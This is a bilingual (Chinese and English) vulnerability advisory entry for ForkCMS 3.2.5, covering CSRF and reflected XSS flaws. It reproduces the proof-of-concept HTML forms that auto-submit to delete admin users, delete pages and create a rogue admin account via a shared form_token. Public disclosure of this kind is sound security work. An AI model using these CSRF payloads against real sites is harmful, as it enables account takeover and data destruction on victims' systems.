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HistoryJul 01, 2014 - 12:00 a.m.

forkcms 3.2.5 - Multiple Vulnerabilities


ForkCMS 3.2.5以及更低版本存在CSRF和XSS(反射型)漏洞。IMB X-Force确认3.2.6版本也存在CSRF漏洞。

ForkCMS 3.2.5存在CSRF漏洞,攻击者可删除admins/users用户,删除网页,并且当授权的admin用户访问包含以下html/javascript代码的网页时可提权:


  <body onload="javascript:document.forms[0].submit()">
  <h2>CSRF Exploit to delete ADMIN/USER account</h2>
  &lt;form method="POST" name="form0" action=""&gt;

注意第一个能删除的ID是2而不是1。因为1是安装阶段创建的超级管理员,称为"Fork CMS"(ForkCMS 定义了 "GOD-user"用户)。ID的编号依次递增。

1.2 删除网页

  &lt;body onload="javascript:document.forms[0].submit()"&gt;
  <h2>CSRF Exploit to delete Web Pages</h2>
  &lt;form method="POST" name="form0" action="http://&lt;fork_cms_ip&gt;/private/en/pages/delete?token=true&id=405"&gt;


1.3 提权
ForkCMS管理session会话的机制不严谨。它使用了一个参数(称为"form_token" ,由32种字母或数字的字符构成)来管理session会话。假设你是一个普通用户(非admin)从同一台机器(台式电脑/笔记本/服务器),从管理员的浏览器登录了网页管理界面,ForkCMS会给双方指定相同的"form_token",这样的逻辑让你可以使用以下代码用你的"form_token" id来创建新的admin:

  &lt;body onload="javascript:document.forms[0].submit()"&gt;
  <h2>CSRF Exploit to add ADMIN account</h2>
  &lt;form method="POST" name="form0" action=""&gt;
  &lt;input type="hidden" name="form" value="add"/&gt;
  &lt;input type="hidden" name="form_token" value="token_number"/&gt;
  &lt;input type="hidden" name="email" value="[email protected]"/&gt;
  &lt;input type="hidden" name="password" value="password"/&gt;
  &lt;input type="hidden" name="confirm_password" value="password"/&gt;
  &lt;input type="hidden" name="name" value="root"/&gt;
  &lt;input type="hidden" name="surname" value="root"/&gt;
  &lt;input type="hidden" name="nickname" value="root"/&gt;
  &lt;input type="hidden" name="avatar" value=""/&gt;
  &lt;input type="hidden" name="interface_language" value="en"/&gt;
  &lt;input type="hidden" name="date_format" value="j F Y"/&gt;
  &lt;input type="hidden" name="time_format" value="H:i"/&gt;
  &lt;input type="hidden" name="number_format" value="dot_nothing"/&gt;
  &lt;input type="hidden" name="csv_split_character" value=";"/&gt;
  &lt;input type="hidden" name="csv_line_ending" value="\n"/&gt;
  &lt;input type="hidden" name="active" value="Y"/&gt;
  &lt;input type="hidden" name="groups[]" value="1"/&gt;


2.XSS (反射型)


# Exploit Title     : ForkCMS 3.2.5 Multiple Vulnerabilities
# Date              : 21-02-2012
# Author            : Ivano Binetti (
# Software link     :
# Vendor site       :
# Version           : 3.2.5 and lower 
# Tested on         : Debian Squeeze (6.0) 
# Original Advisory :
# CVE ID            : CVE-2012-1304, CVE-2012-1305, CVE-2012-1306, CVE-2012-1307
# Secunia ID        : SA48067 
# OSVDB ID          : 79444 (
# IBM X-Force ID    : 73394 (
# Other Advisory    : 
# Other Advisory    : (SecureList)
# Other Advisory    :
+------------------------------------------[Multiple Vulnerabilities by Ivano Binetti]-------------------------------------------+

2)Vulnerabilities Description
 2.1 CSRF
  2.1.1 Delete Admins or Users 
  2.1.2 Delete Web Pages
  2.1.3 Privilege Escalation
 2.2 XSS (Reflected)
3)Personal observations
ForkCMS is a cms with an &#34;intuitive and user friendly interface&#34;.

2)Vulnerabilities Description
ForkCMS 3.2.5 (and lower) suffers from CSRF and XSS (reflected) vulnerabilities. IMB X-Force confirmed that also 3.2.6 version is
affected by CSRF vulnerability.
 2.1 CSRF
 ForkCMS 3.2.5 is prone to a CSRF Vulnerability which allows an attacker to delete admins/users, delete web pages and do 
 privilege escalation when an authenticated admin browses a web page containing the following html/javascript code.
  2.1.1 Delete Admins or Users 
  &#60;body onload=&#34;javascript:document.forms[0].submit()&#34;&#62;
  &#60;H2&#62;CSRF Exploit to delete ADMIN/USER account&#60;/H2&#62;
  &#60;form method=&#34;POST&#34; name=&#34;form0&#34; action=&#34;;&#62;

  Note that the first id which is possible to delete is 2 because id 1 - named &#34;Fork CMS&#34;- is a superuser admin created during 
  installation phase (ForkCMS define this user &#34;GOD-user&#34;) . IDs&#39;s numeration is incremental.
  2.1.2 Delete Web Pages
  &#60;body onload=&#34;javascript:document.forms[0].submit()&#34;&#62;
  &#60;H2&#62;CSRF Exploit to delete Web Pages&#60;/H2&#62;
  &#60;form method=&#34;POST&#34; name=&#34;form0&#34; action=&#34;http://&#60;fork_cms_ip&#62;/private/en/pages/delete?token=true&id=405&#34;&#62;

  NOte that first id is 405 and IDs&#39;s numeration is incremental.

  2.1.3 Privilege Escalation
  ForkCMS uses a poor logic to manage sessions. It uses a parameter (called &#34;form_token&#34; and composed by 32 alphanumeric 
  characters) to manage sessions but suppose that you are a normal (not admin) user which sign in into web management 
  interface from the same machine (pc/notebook/server) and same browser of an administrator: ForkCMS will assign the same 
  &#34;form_token&#34; for both so this logic will allow you to use your &#34;form_token&#34; id to create a new admin with the following code:
  &#60;body onload=&#34;javascript:document.forms[0].submit()&#34;&#62;
  &#60;H2&#62;CSRF Exploit to add ADMIN account&#60;/H2&#62;
  &#60;form method=&#34;POST&#34; name=&#34;form0&#34; action=&#34;;&#62;
  &#60;input type=&#34;hidden&#34; name=&#34;form&#34; value=&#34;add&#34;/&#62;
  &#60;input type=&#34;hidden&#34; name=&#34;form_token&#34; value=&#34;token_number&#34;/&#62;
  &#60;input type=&#34;hidden&#34; name=&#34;email&#34; value=&#34;[email protected]&#34;/&#62;
  &#60;input type=&#34;hidden&#34; name=&#34;password&#34; value=&#34;password&#34;/&#62;
  &#60;input type=&#34;hidden&#34; name=&#34;confirm_password&#34; value=&#34;password&#34;/&#62;
  &#60;input type=&#34;hidden&#34; name=&#34;name&#34; value=&#34;root&#34;/&#62;
  &#60;input type=&#34;hidden&#34; name=&#34;surname&#34; value=&#34;root&#34;/&#62;
  &#60;input type=&#34;hidden&#34; name=&#34;nickname&#34; value=&#34;root&#34;/&#62;
  &#60;input type=&#34;hidden&#34; name=&#34;avatar&#34; value=&#34;&#34;/&#62;
  &#60;input type=&#34;hidden&#34; name=&#34;interface_language&#34; value=&#34;en&#34;/&#62;
  &#60;input type=&#34;hidden&#34; name=&#34;date_format&#34; value=&#34;j F Y&#34;/&#62;
  &#60;input type=&#34;hidden&#34; name=&#34;time_format&#34; value=&#34;H:i&#34;/&#62;
  &#60;input type=&#34;hidden&#34; name=&#34;number_format&#34; value=&#34;dot_nothing&#34;/&#62;
  &#60;input type=&#34;hidden&#34; name=&#34;csv_split_character&#34; value=&#34;;&#34;/&#62;
  &#60;input type=&#34;hidden&#34; name=&#34;csv_line_ending&#34; value=&#34;\n&#34;/&#62;
  &#60;input type=&#34;hidden&#34; name=&#34;active&#34; value=&#34;Y&#34;/&#62;
  &#60;input type=&#34;hidden&#34; name=&#34;groups[]&#34; value=&#34;1&#34;/&#62;
  NOte that this logic is the same if you are two administrators or two normal users.
  Also note that with little changes to this exploit you can modify any ForkCMS parameters. 

 2.2 XSS (Reflected)

3)Personal observations
I think that this is a very nice cms which can become great with some security improvements.

Related for SSV:72646